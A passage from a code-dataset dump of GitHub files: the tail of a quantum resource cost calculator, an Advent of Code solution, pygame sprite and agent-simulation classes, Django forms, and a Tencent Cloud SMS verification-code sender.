int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Omega = self.molecule.Omega\n\n arguments = (self.p_fail, N_grid, eta, Omega)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.shc_trotter, arguments)\n\n self.costs['shc_trotter'] += [methods_plane_waves.shc_trotter(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Omega)]\n\n elif method == 'low_depth_taylor':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'Lambda_value_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n lambda_value_grid = self.molecule.lambda_value_grid \n H_norm_lambda_ratio = self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N_grid, lambda_value_grid, H_norm_lambda_ratio)\n\n # generate value for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.low_depth_taylor, arguments)\n\n self.costs['low_depth_taylor'] += [methods_plane_waves.low_depth_taylor(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n lambda_value_grid, \n H_norm_lambda_ratio)]\n\n elif method == 'low_depth_taylor_on_the_fly':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Gamma_grid = self.molecule.Gamma_grid \n lambda_value_grid = self.molecule.lambda_value_grid \n Omega = self.molecule.Omega\n \n x_max = self.molecule.xmax\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N_grid, eta, Gamma_grid, lambda_value_grid, Omega, J, x_max)\n\n # generate value for errors epsilon_PEA, epsilon_HS, epsilon_S, epsilon_H, epsilon_tay\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_plane_waves.low_depth_taylor_on_the_fly, arguments)\n\n # find x_max from cell volume assuming a perfect cube centered on 0\n self.costs['low_depth_taylor_on_the_fly'] += [methods_plane_waves.low_depth_taylor_on_the_fly(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta,\n Gamma_grid,\n lambda_value_grid , \n Omega,\n J, \n x_max)]\n\n elif method == 'linear_t' or method == 'sparsity_low_rank':\n\n methods_qrom = qrom_methods.QROM_methods(self.tools)\n\n if method == 'linear_t':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n lambda_value_grid = self.molecule.lambda_value_grid\n H_norm_lambda_ratio = self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N_grid, lambda_value_grid, H_norm_lambda_ratio)\n\n # generate value for errors epsilon_PEA, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(2, methods_qrom.linear_t, arguments)\n \n self.costs['linear_t'] += [methods_qrom.linear_t(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n lambda_value_grid ,\n H_norm_lambda_ratio)]\n\n elif method == 'sparsity_low_rank':\n\n if not hasattr(self.molecule, 'sparsity_d') or not hasattr(self.molecule, 'final_rank') or not hasattr(self.molecule, 'lambda_value_low_rank'):\n self.molecule.low_rank_approximation(sparsify = True)\n\n N = self.molecule.N\n lambda_value = self.molecule.lambda_value_low_rank\n sparsity_d = self.molecule.sparsity_d \n final_rank = self.molecule.final_rank\n H_norm_lambda_ratio = self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N, lambda_value, final_rank, H_norm_lambda_ratio, sparsity_d)\n \n # generate value for errors epsilon_PEA, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(2, methods_qrom.sparsity_low_rank, arguments)\n\n self.costs['sparsity_low_rank'] += [methods_qrom.sparsity_low_rank(\n optimized_errors.x,\n self.p_fail,\n N, \n lambda_value,\n final_rank, \n H_norm_lambda_ratio,\n sparsity_d)]\n \n elif method == 'interaction_picture' or method == 'sublinear_scaling':\n\n methods_interaction_picture = interaction_picture.Interaction_picture(self.tools)\n\n if method == 'interaction_picture':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n \n if not hasattr(self.molecule, 'lambda_value_T') or not hasattr(self.molecule, 'lambda_value_U_V') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n self.molecule.lambda_of_Hamiltonian_terms_2nd(grid)\n\n lambda_value_T = self.molecule.lambda_value_T \n lambda_value_U_V = self.molecule.lambda_value_U_V\n\n N_grid = self.molecule.N_grid\n Gamma_grid = self.molecule.Gamma_grid \n\n arguments = (self.p_fail, N_grid, Gamma_grid, lambda_value_T, lambda_value_U_V)\n\n # generate value for errors epsilon_S, epsilon_HS, epsilon_PEA\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_interaction_picture.interaction_picture, arguments)\n\n self.costs['interaction_picture'] += [methods_interaction_picture.interaction_picture(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n Gamma_grid, \n lambda_value_T, \n lambda_value_U_V)]\n \n \n # TO BE DELETED\n elif method == 'sublinear_scaling':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_T') or not hasattr(self.molecule, 'lambda_value_U_V') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Gamma_grid = self.molecule.Gamma_grid \n Omega = self.molecule.Omega\n \n\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n Omega = self.molecule.Omega\n self.molecule.lambda_of_Hamiltonian_terms_1st(eta, Omega, N_grid)\n lambda_value_T, lambda_value_U_V = self.molecule.lambda_value_T, self.molecule.lambda_value_U_V\n\n arguments = (self.p_fail, N_grid, eta, Gamma_grid , lambda_value_T, lambda_value_U_V, J)\n\n # generate value for errors epsilon_S, epsilon_HS, epsilon_PEA, epsilon_mu, epsilon_M_0, epsilon_R\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(6, methods_interaction_picture.sublinear_scaling_interaction, arguments)\n\n self.costs['sublinear_scaling'] += [methods_interaction_picture.sublinear_scaling_interaction(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Gamma_grid, \n lambda_value_T, \n lambda_value_U_V,\n J)]\n\n else:\n print('<*> ERROR: method', method, 'not implemented or not existing')\n\n if self.molecule_info_type == 'name' and self.molecule.has_data:\n json_name = str(self.molecule.molecule_info)+ '_' + str(self.basis)\n self.molecule.save(json_name = 'parameters/'+json_name+'_'+str(self.tools.config_variables['gauss2plane_overhead']))\n\n def calculate_optimized_errors(self, number_errors, cost_method, arguments):\n\n constraints = self.tools.generate_constraints(number_errors)\n initial_values = self.tools.generate_initial_error_values(number_errors)\n\n optimized_errors = minimize(\n fun=cost_method,\n x0=initial_values,\n method=self.tools.config_variables['optimization_method'],\n constraints=constraints,\n args=arguments,\n )\n\n return optimized_errors\n\n\n def calculate_time(self, T_gates, p_fail = 1e-1, p_surface_step = 1e-3, P_inject = 5e-3, P_threshold = 5.7e-3, t_cycle = 2e-7, AAA_factories = 1e3):\n '''\n DEPRECATED: use https://github.com/quantumlib/OpenFermion/blob/master/src/openfermion/resource_estimates/surface_code_compilation/physical_costing.py \n\n Calculates the time required to synthesise the T_gates.\n Based on Appendix M from PHYSICAL REVIEW A 86, 032324 (2012); \"Surface codes: Towards practical large-scale quantum computation\" by Austin G. Fowler\n\n Arguments:\n T_gates: int; the numer of T gates that we have to synthesise\n p_fail: int; the probability of failure.\n P_inject: float; the failure probability in injected states\n P_threshold: float; the surface code failure probability\n t_cycle: float; the time of one cycle of the surface code\n AAA_factories: float; the number of AAA factories available working in parallel\n\n Returns:\n time: float; the time (seconds) required to synthesise the T_gates\n '''\n \n raise Warning('This function is deprecated: check https://quantum-journal.org/papers/q-2019-04-30-135/ and OpenFermion costing module https://github.com/quantumlib/OpenFermion/blob/master/src/openfermion/resource_estimates/surface_code_compilation/physical_costing.py')\n \n P_A = p_fail/T_gates\n\n p_list = [P_inject]\n assert(35*P_inject**3 < 1)\n while p_list[-1] < P_A:\n p = 35*p_list[-1]**3\n p_list.append(p)\n\n def distance_2_error(distance,ord):\n de = np.floor((int(distance)+1)/2)\n PL = 3e-2*(p_surface_step/P_threshold)**de\n p_i = 15**ord*16*3*2*1.25*distance*PL\n return p_i\n\n vfunc = np.vectorize(distance_2_error)\n\n constraints = NonlinearConstraint(fun = lambda distances: vfunc(distances, list(range(len(p_list)))), lb = -np.inf, ub = p_list)\n\n x0 = [17]\n for i in range(len(p_list)-1):\n x0.append(x0[-1]*2)\n \n res = minimize(fun = lambda distances: distances.sum(), x0 = x0, method = 'SLSQP', constraints = constraints)\n distances = res.x\n\n distances = [int(d) for d in distances]\n\n code_cycles = 8*1.25*sum(distances)\n\n time = code_cycles*t_cycle*T_gates/AAA_factories\n\n return time\n","repo_name":"PabloAMC/TFermion","sub_path":"cost_calculator.py","file_name":"cost_calculator.py","file_ext":"py","file_size_in_byte":23428,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"36402037917","text":"data = [x.split('\\n') for x in open('6.txt').read().split('\\n\\n')]\n\ntotal = 0\n\nfor group in data:\n a = {l:0 for l in 'abcdefghijklmnopqrstuvwxyz'}\n for person in group:\n for ans in person:\n a[ans] += 1\n\n total += len([x for x, y in a.items() if y == len(group)])\n\nprint(total)\n","repo_name":"MaximeGoyette/adventOfCode2020","sub_path":"6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23380476987","text":"import pygame\nfrom support import import_folder\n\n\nclass Tile(pygame.sprite.Sprite):\n def __init__(self, size, x, y):\n super(Tile, self).__init__()\n self.image = pygame.Surface((size, size)) # 砖块大小\n self.rect = self.image.get_rect(topleft=(x, y))\n\n def update(self, x_shift):\n self.rect.x += x_shift # 地图位移\n\n\nclass StaticTile(Tile):\n def __init__(self, size, surface, x, y):\n super(StaticTile, self).__init__(size, x, y)\n self.image = surface\n\n\nclass Crate(StaticTile):\n def __init__(self, size, x, y):\n super().__init__(size, pygame.image.load('../graphics/terrain/crate.png').convert_alpha(), x, y)\n offset_y = y + size\n self.rect = self.image.get_rect(bottomleft=(x, offset_y))\n\n\nclass AnimationTile(Tile):\n def __init__(self, size, x, y, path):\n super(AnimationTile, self).__init__(size, x, y)\n self.frames = import_folder(path)\n self.frames_index = 0\n self.animation_speed = 0.15\n self.image = self.frames[self.frames_index]\n\n def animation(self):\n self.frames_index += self.animation_speed\n if self.frames_index >= len(self.frames):\n self.frames_index = 0\n self.image = self.frames[int(self.frames_index)]\n\n def update(self, x_shift):\n self.animation()\n self.rect.x += x_shift\n\n\nclass Coins(AnimationTile):\n def __init__(self, size, x, y, path, value):\n super(Coins, self).__init__(size, x, y, path)\n offset_x = x + (size / 2)\n offset_y = y + (size / 2)\n self.rect = self.image.get_rect(center=(offset_x, offset_y))\n self.value = value\n\n\nclass Plams(AnimationTile):\n def __init__(self, size, x, y, path):\n super(Plams, self).__init__(size, x, y, path)\n offset_y = y + size\n self.rect = self.image.get_rect(bottomleft=(x, offset_y))\n plams_leaf = (self.rect.width, 58)\n self.rect = pygame.Rect(self.rect.topleft,plams_leaf)","repo_name":"idloneal/pygame","sub_path":"平台跳跃/code/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2545668333","text":"import pygame\nfrom controlador_comida_v3 import *\n\n\n# La clase persona, que será la que llevará la máquina de estados finito dentro de si\nclass Person:\n choque = False\n mutacion = 0.15\n Estados = (\"Nace\", \"Camina\", \"Come\", \"Busca_comida\",\n \"Ataca\", \"Reproduce\", \"Busca_pareja\", \"Muere\")\n currentEstado = Estados[0]\n\n def cargar_datos(self, _adn=None):\n if _adn is None:\n self.velocidad = random.uniform(3, 5)\n self.color = colors.Colors[random.randint(1, len(colors.Colors) - 2)]\n self.radio = 5 + random.uniform(-2, 2)\n self.energia_max = 150 + random.uniform(-50, 50)\n self.best_max = 300 + random.uniform(-100, 100)\n self.distance_search_partner_max = 300 + random.uniform(-100, 100)\n else:\n self.velocidad = _adn[0]\n self.color = _adn[1]\n self.radio = _adn[2]\n self.energia_max = _adn[3]\n self.best_max = _adn[4]\n self.distance_search_partner_max = _adn[5]\n self.energia = float(self.energia_max)\n self.best = float(self.best_max)\n self.distance_search_partner = float(self.distance_search_partner_max)\n self.currentEstado = self.Estados[1]\n\n def __init__(self, px, py, _lista_comidas, _lista_agentes, _adn=None):\n self.is_ded = False\n self.posicion = pygame.Vector2(px, py)\n self.cargar_datos(_adn)\n self.score = 0\n self.my_fud = None\n self.my_partner = None\n self.willing = None\n self.id_comida = int\n self.lista_comidas = _lista_comidas\n self.lista_agentes = _lista_agentes\n self.id_partner = int\n self.comidas_comidas = 0\n # print(self.comidas_comidas)\n\n def actual(self, screen):\n # Camina\n if self.currentEstado == self.Estados[1]:\n if self.energia > 0:\n self.mover_A([random.randint(0, screen.get_width()),random.randint(0, screen.get_height())])\n if self.energia >= 200:\n self.currentEstado = self.Estados[6] # Busca_pareja\n elif 0 < self.energia < 200:\n self.currentEstado = self.Estados[3] # Busca_comida\n self.energia -= 1\n else:\n self.currentEstado = self.Estados[7]\n\n # Come\n if self.currentEstado == self.Estados[2]:\n # print(self.my_fud, \"mio\")\n # print(self.energia)\n if self.my_fud is not None:\n # if self.objetivo(self.my_fud.get_pos(), 3.5):\n if self.objetivo2(self.my_fud):\n if self.my_fud.is_eaten() is False:\n self.energia += self.my_fud.alimento\n self.comidas_comidas += 1\n self.my_fud.eaten()\n self.my_fud = None\n self.best = 300\n self.currentEstado = self.Estados[1]\n else:\n self.currentEstado = self.Estados[3]\n else:\n self.currentEstado = self.Estados[3]\n else:\n self.currentEstado = self.Estados[3]\n self.energia -= 0.5\n if self.energia <= 50:\n self.currentEstado = self.Estados[3] # Busca_comida\n if self.energia > 50:\n self.currentEstado = self.Estados[1] # Camina\n # Busca_comida\n if self.currentEstado == self.Estados[3]:\n # print(\"hm\")\n if self.my_fud is not None:\n if self.my_fud.is_eaten() is False:\n # self.mover_A(self.my_fud.get_pos())\n self.mover_A_entidad(self.my_fud)\n # if self.objetivo(self.my_fud.get_pos(), 2.5):\n if self.objetivo2(self.my_fud):\n self.currentEstado = self.Estados[2]\n else:\n self.my_fud = None\n self.currentEstado = self.Estados[1]\n else:\n # self.currentEstado = self.Estados[3]\n self.best = 300\n self.buscar_comida()\n if self.my_fud is None:\n self.currentEstado = self.Estados[1]\n if self.buscar_comida() is False:\n self.currentEstado = self.Estados[1]\n self.energia -= 0.5\n # Reproduce\n if self.currentEstado == self.Estados[5]:\n # print(\"AAAA\")\n if self.is_willing() and self.my_partner.is_willing():\n # if self.objetivo(self.my_partner.get_pos(), 3.5):\n if self.objetivo2(self.my_partner):\n self.crear_hijo()\n # print(\"boom un hijo\", self.energia, self.currentEstado)\n elif self.energia >= 100:\n # self.mover_A(self.my_partner.get_pos())\n self.mover_A_entidad(self.my_partner)\n else:\n self.currentEstado = self.Estados[1]\n # self.my_partner=None\n elif self.energia >= 200:\n self.currentEstado = self.Estados[6]\n else:\n self.currentEstado = self.Estados[1]\n self.energia -= 1\n # if self.currentEstado == self.Estados[5]:\n # if self.energia >= 200:\n # nuevo_agente = Person(float(self.velocidad),\n # float(self.posicion.x + 20),\n # float(self.posicion.y), self.lista_comidas, self.lista_agentes,\n # (self.color[0], self.color[1] + 10, 0)\n # )\n # self.lista_agentes.append(nuevo_agente)\n # self.energia -= 20\n # self.currentEstado = self.Estados[1]\n # # print(\"boom un hijo\", self.energia, self.currentEstado)\n # self.currentEstado = self.Estados[1]\n # Busca_pareja\n if self.currentEstado == self.Estados[6]:\n # print(\"ojo\")\n self.willing = True\n if self.my_partner is not None:\n if self.my_partner.is_willing() is True:\n # self.mover_A(self.my_partner.get_pos())\n self.mover_A_entidad(self.my_partner)\n # if self.objetivo(self.my_partner.get_pos(), 2.5):\n if self.objetivo2(self.my_partner):\n self.currentEstado = self.Estados[5]\n else:\n self.my_partner = None\n self.currentEstado = self.Estados[1]\n else:\n self.distance_search_partner = 600\n self.buscar_pareja()\n if self.my_partner is None:\n if self.energia <= 100:\n self.willing = False\n self.currentEstado = self.Estados[1]\n else:\n self.currentEstado = self.Estados[1]\n\n # if self.my_partner is None or self.energia <= 100:\n # self.willing=False\n # self.currentEstado = self.Estados[1]\n elif self.buscar_pareja() is False:\n self.currentEstado = self.Estados[1]\n self.energia -= 0.5\n # Muere\n if self.currentEstado == self.Estados[7]:\n self.is_ded = True\n comida = Comida(self.posicion.x, self.posicion.y, 40, color=colors.BLACK)\n self.lista_comidas.append(comida)\n # print(\"ded\")\n # print(self.energia)\n # print(self.currentEstado)\n pygame.draw.circle(screen, self.color, self.posicion, self.radio)\n\n # Acá calcula que tan lejos esta del objetivo al que está yendo\n def objetivo(self, _objetivo, _dis):\n return pygame.Vector2.length(self.posicion - _objetivo) <= _dis\n\n def objetivo2(self, _objetivo):\n return pygame.Vector2.length(self.posicion - _objetivo.posicion) <= abs(self.radio-_objetivo.radio)\n\n def buscar_comida(self):\n if self.lista_comidas:\n for _ in range(len(self.lista_comidas)):\n temp_comida = self.lista_comidas[_].get_pos()\n dist = pygame.Vector2.length(temp_comida - self.posicion)\n if dist <= self.best:\n self.my_fud = self.lista_comidas[_]\n self.best = dist\n self.id_comida = self.lista_comidas.index(self.lista_comidas[_])\n else:\n return False\n # print(self.lista_comidas[self.id_comida], \"mundo\")\n # print(self.lista_comidas[self.id_comida] is self.my_fud, \"es?\")\n\n def buscar_pareja(self):\n if self.lista_agentes:\n for _ in range(len(self.lista_agentes)):\n if self.lista_agentes[_] is not self:\n temp_agente = self.lista_agentes[_].get_pos()\n dist = pygame.Vector2.length(temp_agente - self.posicion)\n if dist <= self.best and self.lista_agentes[_].my_partner is None \\\n and self.lista_agentes[_].is_willing():\n self.my_partner = self.lista_agentes[_]\n self.distance_search_partner = dist\n self.lista_agentes[_].my_partner = self\n self.id_partner = self.lista_agentes.index(self.lista_agentes[_])\n else:\n return False\n # print(self.lista_comidas[self.id_comida], \"mundo\")\n # print(self.lista_comidas[self.id_comida] is self.my_fud, \"es?\")\n\n def mover_A(self, _objetivo):\n dist = self.posicion - _objetivo\n if not dist.length()<=0:\n delta = pygame.Vector2.normalize(dist)\n if not self.is_ded:\n if not self.objetivo(_objetivo=_objetivo, _dis=2.5):\n # if not self.objetivo2(_objetivo=_objetivo):\n if not dist.length() < self.velocidad:\n self.posicion -= delta * self.velocidad\n else:\n self.posicion -= delta * dist.length()\n else: self.currentEstado = self.Estados[7]\n else: self.currentEstado=self.Estados[2]\n\n def mover_A_entidad(self, _objetivo):\n dist = self.posicion - _objetivo.posicion\n if not dist.length()<=0:\n delta = pygame.Vector2.normalize(dist)\n if not self.is_ded:\n if not self.objetivo2(_objetivo=_objetivo):\n if not dist.length() < self.velocidad:\n self.posicion -= delta * self.velocidad\n else:\n self.posicion -= delta * dist.length()\n else: self.currentEstado=self.Estados[7]\n\n def get_pos(self):\n return self.posicion\n\n def is_willing(self):\n return self.willing\n\n def crear_hijo(self):\n #### posicion\n temp_pos = pygame.Vector2((self.posicion.x + self.my_partner.get_pos().x) / 2,\n (self.posicion.y + self.my_partner.get_pos().y) / 2)\n #### velocidad\n if 1 - self.mutacion > random.random() > 0.5:\n temp_speed = float(self.velocidad)\n elif self.mutacion < random.random() <= 0.5:\n temp_speed = float(self.my_partner.velocidad)\n else:\n temp_speed = (float(self.velocidad) + float(self.my_partner.velocidad)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5: temp_speed += random.uniform(-0.5, 0.5)\n if temp_speed <= 0: temp_speed = 0.1\n #### color\n temp_color = [0, 0, 0]\n if 1 - self.mutacion > random.random() > 0.5:\n temp_color = [self.color[0], self.color[1], self.color[2]]\n elif self.mutacion < random.random() <= 0.5:\n temp_color = [self.my_partner.color[0], self.my_partner.color[1], self.my_partner.color[2]]\n else:\n for _ in range(len(temp_color)):\n temp_color[_] = round((self.color[_] + self.my_partner.color[_]) / 2)\n if random.random() < self.mutacion:\n for _ in range(len(temp_color)):\n if random.random() < 0.5:\n temp_color[_] += random.randint(-10, 10)\n if temp_color[_] > 255:\n temp_color[_] = 255\n elif temp_color[_] < 0:\n temp_color[_] = 0\n #### radio\n if 1 - self.mutacion > random.random() > 0.5:\n temp_radius = float(self.radio)\n elif self.mutacion < random.random() <= 0.5:\n temp_radius = float(self.my_partner.radio)\n else:\n temp_radius = (float(self.radio) + float(self.my_partner.radio)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_radius += random.uniform(-0.5, 0.5)\n if temp_radius > 10:\n temp_radius = 10\n elif temp_radius < 1:\n temp_radius = 1\n #### energia_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_energia = float(self.energia_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_energia = float(self.my_partner.energia_max)\n else:\n temp_energia = (float(self.energia_max) + float(self.my_partner.energia_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_energia += 0.1\n else:\n temp_energia -= 0.1\n if temp_energia > 8:\n temp_energia = 8\n elif temp_energia < 1:\n temp_energia = 1\n #### best_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_best = float(self.best_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_best = float(self.my_partner.best_max)\n else:\n temp_best = (float(self.best_max) + float(self.my_partner.best_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_best += 0.1\n else:\n temp_best -= 0.1\n if temp_best > 8:\n temp_best = 8\n elif temp_best < 1:\n temp_best = 1\n #### distance_search_partner_max\n if 1 - self.mutacion > random.random() > 0.5:\n temp_partner_max = float(self.distance_search_partner_max)\n elif self.mutacion < random.random() <= 0.5:\n temp_partner_max = float(self.my_partner.distance_search_partner_max)\n else:\n temp_partner_max = (float(self.distance_search_partner_max) + float(\n self.my_partner.distance_search_partner_max)) / 2\n if random.random() < self.mutacion:\n if random.random() < 0.5:\n temp_partner_max += 0.1\n else:\n temp_partner_max -= 0.1\n if temp_partner_max > 8:\n temp_partner_max = 8\n elif temp_partner_max < 1:\n temp_partner_max = 1\n adn_ = [temp_speed, temp_color, temp_radius, temp_energia, temp_best, temp_partner_max]\n adn_string = ''.join([str(item) for item in adn_])\n print(adn_string)\n print(adn_string[0])\n\n # nuevo_agente = Person(temp_pos.x, temp_pos.y,\n # self.lista_comidas, self.lista_agentes,\n # temp_speed, temp_color\n # )\n nuevo_agente = Person(temp_pos.x, temp_pos.y, self.lista_comidas,\n self.lista_agentes, adn_\n )\n self.lista_agentes.append(nuevo_agente)\n self.energia -= 75\n self.my_partner.energia -= 75\n self.willing = False\n self.my_partner.willing = False\n self.distance_search_partner = 600\n self.my_partner.distance_search_partner = 600\n self.my_partner.currentEstado = self.Estados[1]\n self.currentEstado = self.Estados[1]\n self.id_partner = None\n self.my_partner = None\n","repo_name":"HamillCavero/TF_inteligencia_artificial","sub_path":"v3/agente_v3.py","file_name":"agente_v3.py","file_ext":"py","file_size_in_byte":16227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12734065022","text":"from django import forms\n\nfrom apps.Entidades.models import aplicacion, cargo, ubicacion, historico_creacion_persona, persona, eliminacion_aplicacion, creacion_aplicacion, usuario, historico_eliminacion_persona\n\nclass PersonaForm_addaplicacion(forms.ModelForm):\n class Meta:\n model = persona\n\n fields = [\n 'nombre_completo',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'aplicaciones': forms.CheckboxSelectMultiple(attrs={'class': 'checkbox_aplicaciones checkbox'}),\n 'nombre_completo': forms.TextInput(attrs={'class': 'nombre_completo_de_adicion_aplicacion'}),\n 'cargo': forms.TextInput(attrs={'class': 'cargo_de_adicion_aplicacion'}),\n 'ubicacion': forms.TextInput(attrs={'class': 'ubicacion_de_adicion_aplicacion'}),\n 'centro': forms.TextInput(attrs={'class': 'centro_de_adicion_aplicacion'}),\n }\n\nclass PersonaForm(forms.ModelForm):\n class Meta:\n model = persona\n fields = [\n 'nombre_completo',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'aplicaciones': forms.CheckboxSelectMultiple(attrs={'class': 'checkbox_aplicaciones_crear_persona_nueva checkbox','id': 'id_aplicaciones_de_persona_nueva'}),\n 'nombre_completo': forms.TextInput(attrs={'id': 'id_nombre_completo_persona_nueva','class':'form-control'}),\n 'cargo': forms.Select(attrs={'id': 'id_cargo_persona_nueva','class':'form-control'}),\n 'ubicacion': forms.Select(attrs={'id': 'id_ubicacion_persona_nueva','class':'form-control'}),\n 'centro': forms.Select(attrs={'id': 'id_centro_persona_nueva','class':'form-control'}),\n }\n\nclass EditarPersonaForm(forms.ModelForm):\n class Meta:\n model = persona\n fields = [\n 'nombre_completo',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n widgets = {\n 'nombre_completo': forms.TextInput(attrs={'class': 'form-control'}),\n 'cargo': forms.Select(attrs={'class': 'form-control'}),\n 'ubicacion': forms.Select(attrs={'class': 'form-control'}),\n 'centro': forms.Select(attrs={'class': 'form-control'}),\n }\n\nclass UsuarioForm(forms.ModelForm):\n class Meta:\n model = usuario\n\n fields = [\n 'usuario',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'ticket',\n ]\n\n\nclass HistoricoForm_creacion_persona(forms.ModelForm):\n class Meta:\n model = historico_creacion_persona\n\n fields = [\n 'persona',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\nclass HistoricoForm_eliminacion_persona(forms.ModelForm):\n class Meta:\n model = historico_eliminacion_persona\n\n fields = [\n 'persona',\n 'aplicaciones',\n 'cargo',\n 'ubicacion',\n 'centro',\n ]\n\n\nclass AplicacionForm(forms.ModelForm):\n class Meta:\n model = creacion_aplicacion\n\n fields = [\n 'ticket',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'usuario',\n ]\n\nclass AplicacionForm_eliminacion(forms.ModelForm):\n class Meta:\n model = eliminacion_aplicacion\n\n fields = [\n 'ticket',\n 'persona_relacionada',\n 'aplicacion_relacionada',\n 'usuario',\n ]\n","repo_name":"mhichel/Cecilia","sub_path":"apps/Entidades/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"12299428102","text":"#! /usr/bin/env python\n# coding=utf-8\n\nimport ast\nimport time\nimport json\nimport random\nimport hashlib\nimport http.client\n\nfrom dao_quote.settings.config_x import (SDKAPPID, APPKEY)\n\n\ndef sms_sender(nationCode, phoneNumber, content):\n url = \"https://yun.tim.qq.com/v5/tlssmssvr/sendsms\"\n rnd = random.randint(100000, 999999)\n time_sms = int(time.time())\n sig = hashlib.sha256('appkey={}&random={}&time={}&mobile={}'.format(\n APPKEY, rnd, time_sms, phoneNumber\n ).encode(\"utf-8\")).hexdigest()\n pkg = {\n \"ext\": \"\",\n \"extend\": \"\",\n \"msg\": content,\n \"sig\": sig,\n \"tel\": {\n \"mobile\": phoneNumber,\n \"nationcode\": nationCode,\n },\n \"time\": time_sms,\n \"type\": 0\n }\n con = None\n data = {'fee': 0}\n try:\n con = http.client.HTTPSConnection('yun.tim.qq.com', timeout=5)\n body = json.dumps(pkg)\n wholeUrl = '{}?sdkappid={}&random={}'.format(\n url, SDKAPPID, rnd)\n con.request('POST', wholeUrl, body)\n response = con.getresponse()\n resp = response.read()\n resp = resp.decode('utf-8')\n data = ast.literal_eval(resp)\n if 'fee' in data:\n pass\n else:\n data['fee'] = 0\n except Exception as e:\n print(e)\n finally:\n if(con):\n con.close()\n return data\n\n\ndef send_vcode(nationCode, phoneNumber, code):\n content = \"【道科技DaoTec】您的验证码是:{},3分钟内有效,切勿将验证码泄露于他人。\".format(code)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef send_order_reminder(nationCode, phoneNumber, strategy_name, order_info):\n content = (\"【道科技DaoTec】尊敬的客户您好!您运行的{}策略有新订单了,\"\n \"订单细节为{},更多行情信息请关注道科技。\").format(strategy_name, order_info)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef send_strategy_reminder(nationCode, 